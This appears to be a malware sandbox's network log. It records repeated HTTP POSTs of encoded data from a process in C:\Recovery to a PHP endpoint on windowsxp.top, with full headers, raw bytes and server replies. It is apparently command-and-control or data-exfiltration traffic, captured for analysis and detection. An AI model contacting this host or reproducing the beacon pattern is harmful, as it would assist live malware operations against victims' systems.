                                                                                                                  Date: Sun, 27 Oct 2024 18:22:59 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w1vgpBbBJC6jwRSsy%2B3EebeI5gMYNDAJVdnUlQSETF4XrX6Qxzj6zcz%2FvLolrxPtURKVYLezHztTLgY2ctCSmoi2iUwO8R2oHYJLr8nNjyRNxDWSMekyjdM5ox3H%2Bo36"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6f1381e345c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1319&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=1213746&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  19192.168.2.449768188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:22:59.291584969 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:59.649451017 CET1008OUTData Raw: 55 55 58 59 5b 5f 53 53 54 58 57 54 54 55 5b 5d 59 51 5b 5b 52 53 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UUXY[_SSTXWTTU[]YQ[[RSR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$2.35:)"&$\9$ ^%;$U8=;=7 23_/=<Z,/!Y##X(
                                                                                                                  Oct 27, 2024 19:22:59.895333052 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:00.194859028 CET775INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:00 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pjbkL2RPZmWrp1WCQse8BWLSPg9BE%2FetSd%2FXVQ2128yNsfyI%2BKnjbEOMJEGHbO130v%2FwDG4UHaV3zSOXlCkDvJDJ4zoTDbU%2BK7hyp0zAETPItJKYeNXRnsryOdddbYzi"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6f7fb17a921-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2086&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=585997&cwnd=127&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  20192.168.2.449769188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:00.330681086 CET345OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:23:00.680715084 CET1012OUTData Raw: 55 51 58 5d 5e 52 53 55 54 58 57 54 54 56 5b 5f 59 5e 5b 59 52 57 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UQX]^RSUTXWTTV[_Y^[YRWRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'&.0Y55_!&4,44$(?;<*?<P#(-=*,6Z.!Y##X(/
                                                                                                                  Oct 27, 2024 19:23:00.956592083 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:01.144697905 CET772INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:01 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rfKTBx%2FW83lT0J6VlA7p74wwMHFCjK4tosBiIHsyhxcLkp4A1Sm6pepQ749ErFdtkEs3I4XyLtw%2F3JOnShWFibBoBWH4%2BDAAoXq9lrgc2A2Ro4oKj1qjd07yPnjLKBKP"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6fe9bd6e95a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1395&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=1059253&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0
                                                                                                                  Oct 27, 2024 19:23:01.439527035 CET772INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:01 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rfKTBx%2FW83lT0J6VlA7p74wwMHFCjK4tosBiIHsyhxcLkp4A1Sm6pepQ749ErFdtkEs3I4XyLtw%2F3JOnShWFibBoBWH4%2BDAAoXq9lrgc2A2Ro4oKj1qjd07yPnjLKBKP"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6fe9bd6e95a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1395&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=1059253&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  21192.168.2.449770188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:01.443068981 CET345OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:23:01.790693045 CET1012OUTData Raw: 50 56 5d 5b 5e 59 53 54 54 58 57 54 54 54 5b 5f 59 51 5b 5a 52 53 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PV][^YSTTXWTTT[_YQ[ZRSR^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'& 9"#& :7$$,8W*Y$ !3^,=/*-!Y##X('
                                                                                                                  Oct 27, 2024 19:23:02.026992083 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:02.222079039 CET772INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:02 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fw12nH4WvajxTCWBcNUr91fXPqm23WrBoxigBtvCafGQj4WdiDxT9jMaQ4hRSpSNyAbyfqf%2B%2BFhuEXMXvHeRdcsWyX8Kf3cMpzuzBmOQbMG7RdfvpffohfhxR6z%2FFRAh"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7054a57a912-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1315&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=1140157&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  22192.168.2.449781188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:02.570138931 CET345OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:23:02.914840937 CET1716OUTData Raw: 55 5a 58 54 5e 5d 56 53 54 58 57 54 54 5c 5b 59 59 5a 5b 51 52 55 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UZXT^]VSTXWTT\[YYZ[QRUR^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'&>+")\!P'-(Y3+8*?8V#</=8>,9?!Y##X(
                                                                                                                  Oct 27, 2024 19:23:03.172195911 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:03.473891973 CET920INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:03 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7a9it4gP70Ivpp57ofyaSAOZSxqWgEnIpSsLseGNWiwgPIYEkmGf0VKxEbRfYonrHvfHDj4YSjoLFkDMrojUvvyTQ7wJb603lbZ2diaRGKX%2BIpf%2B64W%2FRPsZRtxoOonh"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b70c7c780bcf-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1596&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2061&delivery_rate=908976&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 21 04 37 3e 06 11 28 3c 21 54 29 32 31 10 30 02 0b 58 2f 0b 33 00 2a 2d 25 50 2e 06 32 54 26 24 2e 1c 3c 29 20 5a 23 58 27 0c 3e 0f 21 5e 00 1c 27 17 36 00 25 14 26 3b 2f 04 33 30 38 5b 23 3d 11 17 3d 58 25 50 3f 5f 23 00 3c 2b 24 0d 2c 2c 21 12 25 5f 22 5f 3b 16 2a 58 3c 00 2a 54 0c 14 21 5a 2e 59 3c 11 22 21 1b 55 2a 54 20 5c 27 00 02 15 24 03 2b 0b 3f 05 34 07 28 3e 3d 59 22 2c 38 5b 28 01 29 05 24 2e 2b 13 3d 04 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98!7>(<!T)210X/3*-%P.2T&$.<) Z#X'>!^'6%&;/308[#==X%P?_#<+$,,!%_"_;*X<*T!Z.Y<"!U*T \'$+?4(>=Y",8[()$.+="T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  23192.168.2.449782188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:02.633383989 CET345OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:23:02.977435112 CET1012OUTData Raw: 55 54 58 5f 5e 58 56 54 54 58 57 54 54 5d 5b 5f 59 5d 5b 5b 52 51 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UTX_^XVTTXWTT][_Y][[RQR\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'&0X!"!(Z,70X0(0/ =<<Q $8>7_>.[:!Y##X(
                                                                                                                  Oct 27, 2024 19:23:03.228634119 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  24192.168.2.449788188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:03.612495899 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:03.961806059 CET1012OUTData Raw: 55 57 5d 58 5e 5c 56 5e 54 58 57 54 54 51 5b 5c 59 5d 5b 5d 52 55 52 5a 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UW]X^\V^TXWTTQ[\Y][]RURZT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'2>0[6%\#64_.400((W,=8>Y+#2X;8*:!Y##X(3
                                                                                                                  Oct 27, 2024 19:23:04.221579075 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:04.408225060 CET781INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:04 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ix59z2gtt9HJBSm6vDTcvvS5gFlEhYdpyLzwVU%2BAWIoC7fvYr%2FWj5%2BfDu8%2B7qX2Zy%2FxypQVQ9cd%2BXOysyrC65KRxjAgYH0L%2BCMizP1u2nJMjSfavuEM8VGwttgteTB%2BC"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b712ef273064-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1561&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=955775&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  25192.168.2.449794188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:04.526927948 CET345OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:23:05.031265974 CET1012OUTData Raw: 55 5a 58 59 5b 5b 56 53 54 58 57 54 54 54 5b 53 59 5e 5b 5f 52 5f 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UZXY[[VSTXWTTT[SY^[_R_R^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$%=3"*65;:B/'7--?*(P"! 8='Z=/6Z:?!Y##X('
                                                                                                                  Oct 27, 2024 19:23:05.130562067 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:05.459125042 CET778INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:05 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JkWg0cN%2F4hpgzvPMTRj%2BAubaDWj1ji4NSGkOKmGyjTkn19LqxSpavtOybRG1BDjpBCS%2B7FIwgy6pp9GPB%2FZHBchHRv6%2BU5FJcf%2FNmRQHEK7vAOIPZXNywlaJRGz9xMHc"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b718ae8de5bd-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1324&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=1135686&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  26192.168.2.449800188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:05.588754892 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:05.946269035 CET1012OUTData Raw: 55 50 58 5d 5e 5d 53 57 54 58 57 54 54 50 5b 5a 59 5a 5b 5c 52 51 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UPX]^]SWTXWTTP[ZYZ[\RQRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'10"9%5;9$0';(V;X+*? 1888=?&[:!Y##X(7
                                                                                                                  Oct 27, 2024 19:23:06.176573992 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:06.480262995 CET766INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:06 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXoPVLPB3pStu5pqfwr9HgQwnutbtUtKgM5k7hvATAqulJx3GwgcwPmE6pXiQ6Bnqb8MI8lUohVHW9riej07JhMsPE5J9R43y19Ilnah2C7thne6Cs8SOKlpupQyfZQf"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b71f39834794-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1385&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1172469&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  27192.168.2.449806188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:06.610922098 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:06.961699009 CET1012OUTData Raw: 55 51 5d 5f 5e 5c 56 53 54 58 57 54 54 54 5b 5b 59 5f 5b 5e 52 55 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UQ]_^\VSTXWTTT[[Y_[^RURYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1>4"*:5P7.$0'8=()/' '[,4=?6^9/!Y##X('
                                                                                                                  Oct 27, 2024 19:23:07.220874071 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:07.513197899 CET770INHTTP/1.1 200 OK
